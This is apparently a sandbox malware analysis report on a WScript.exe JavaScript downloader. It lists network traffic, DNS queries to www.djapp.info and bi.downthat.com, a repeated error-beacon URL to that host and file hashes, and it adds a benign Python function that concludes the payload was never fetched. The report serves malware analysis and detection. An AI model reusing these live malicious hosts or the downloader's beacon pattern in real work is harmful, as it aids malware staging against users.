    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 204.79.197.237:443
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB
    tls, http2
    2.5kB
    9.0kB
    20
    17

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

    HTTP Response

    204
  • 88.221.83.184:443
    https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981
    tls, http2
    1.4kB
    5.3kB
    16
    10

    HTTP Request

    GET https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

    HTTP Response

    200
  • 88.221.83.184:443
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.6kB
    6.4kB
    16
    12

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
    283 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
    283 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
    283 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
    283 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    30.5kB
    883.0kB
    645
    641

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    13
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
    191 B
    1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    3.130.253.23
    3.130.204.160

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    65 B
    113 B
    1
    1

    DNS Request

    www.hugedomains.com

    DNS Response

    172.67.70.191
    104.26.7.37
    104.26.6.37

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    23.253.130.3.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    23.253.130.3.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    72.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    72.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
    143 B
    1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    184.83.221.88.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    184.83.221.88.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    120 B
    278 B
    2
    2

    DNS Request

    www.djapp.info

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    86.23.85.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    86.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    240.197.17.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    240.197.17.2.in-addr.arpa

  • 8.8.8.8:53
    249.197.17.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    249.197.17.2.in-addr.arpa

  • 8.8.8.8:53
    29.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    29.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    173 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    73 B
    106 B
    1
    1

    DNS Request

    200.197.79.204.in-addr.arpa
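
What the Network section shows, once the sandbox's own Bing/Spotlight traffic (the WindowsShellClient and Edge User-Agents) is set aside, is a downloader whose chain is dead at analysis time: every A query for www.djapp.info, the host on the WScript.exe command line, came back with no answer; the script then reported the failure to bi.downthat.com, carrying the COM error text and an empty downloadurl; and bi.downthat.com itself now resolves through hugedomains.com and answers with a 302 to a domain-sale page. The function below is an added example for this report (not the sample's code and not Triage's) that encodes that reasoning so the same call can be made mechanically for other runs. The DNS answers, request URL and redirect are copied from the report; the conclusion labels and the list of parking hosts are this example's own assumptions.

```python
"""Triage the WScript.exe network activity from this report.

Added example (not the sample's code, not Triage's). DNS_ANSWERS and BEACON
are copied from the Network section; labels and PARKING_HOSTS are ours.
"""
from urllib.parse import urlsplit, unquote

STAGE2_HOST = "www.djapp.info"   # host on the WScript.exe command line

# name -> A records returned (empty list = query answered with no records)
DNS_ANSWERS = {
    "www.djapp.info": [],                                  # asked repeatedly, never answered
    "bi.downthat.com": ["3.130.253.23", "3.130.204.160"],  # via CNAME to hugedomains.com
}

# The only HTTP request WScript.exe managed to send, and the reply.
BEACON = {
    "url": ("http://bi.downthat.com/?script_error4=1"
            "&The%20system%20cannot%20locate%20the%20resource%20specified."
            "&errorloc=manual_redirect1&downloadurl="),
    "status": 302,
    "location": "https://www.hugedomains.com/domain_profile.cfm?d=downthat.com",
}

# Message text of URLMon error 0x800C0005 (INET_E_RESOURCE_NOT_FOUND), which an
# MSXML2.XMLHTTP request raises when the target host does not resolve.
RESOURCE_NOT_FOUND_TEXT = "The system cannot locate the resource specified."

# Redirect targets that mean "this domain is parked / for sale" (assumed list).
PARKING_HOSTS = {"www.hugedomains.com", "hugedomains.com"}


def parse_error_beacon(url: str) -> dict:
    """Split the beacon query into key=value fields and bare tokens. The script
    inserts the COM error message as a bare token (no '='), so it is kept
    separately instead of being squashed into an empty-valued key."""
    fields, messages = {}, []
    for part in urlsplit(url).query.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[unquote(key)] = unquote(value)
        elif part:
            messages.append(unquote(part))
    return {"host": urlsplit(url).hostname, "fields": fields, "messages": messages}


def triage_downloader(stage2_host: str, dns_answers: dict, beacon: dict) -> dict:
    """Correlate the stage-2 DNS result with what the script told its beacon host."""
    parsed = parse_error_beacon(beacon["url"])
    conclusions = []

    if not dns_answers.get(stage2_host):
        conclusions.append("stage2_host_unresolved")
    if RESOURCE_NOT_FOUND_TEXT in parsed["messages"]:
        conclusions.append("script_reported_resolution_failure")
    if not parsed["fields"].get("downloadurl"):
        conclusions.append("no_payload_url_reported")

    redirect_host = urlsplit(beacon.get("location") or "").hostname
    if beacon["status"] in (301, 302, 307, 308) and redirect_host in PARKING_HOSTS:
        conclusions.append("beacon_host_parked")

    payload_retrieved = ("stage2_host_unresolved" not in conclusions
                         and "no_payload_url_reported" not in conclusions)
    return {
        "beacon_host": parsed["host"],
        "error_text": parsed["messages"][0] if parsed["messages"] else None,
        "beacon_fields": parsed["fields"],
        "payload_retrieved": payload_retrieved,
        "conclusions": conclusions,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage_downloader(STAGE2_HOST, DNS_ANSWERS, BEACON), indent=2))
```

For this run every conclusion label fires and payload_retrieved is False, which is why no second-stage executable appears under Downloads even though the script was told to write C:\Users\Admin\AppData\Local\Temp\fuf4314.exe. A run where the stage-2 host resolved and the beacon carried a non-empty downloadurl yields an empty conclusion list, and that is the case where the dropped executable should be pulled from the sandbox and analysed separately. The MSIE 7.0 / WOW64 User-Agent on the beacon is the WinINet default for a 32-bit process, consistent with the SysWOW64 WScript.exe in the process tree, and is a better network signature for this family than the parked domain.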

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\fuf4314.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
